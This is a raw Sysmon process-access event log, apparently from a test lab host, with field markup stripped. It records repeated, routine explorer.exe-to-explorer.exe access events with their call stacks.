16:56:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 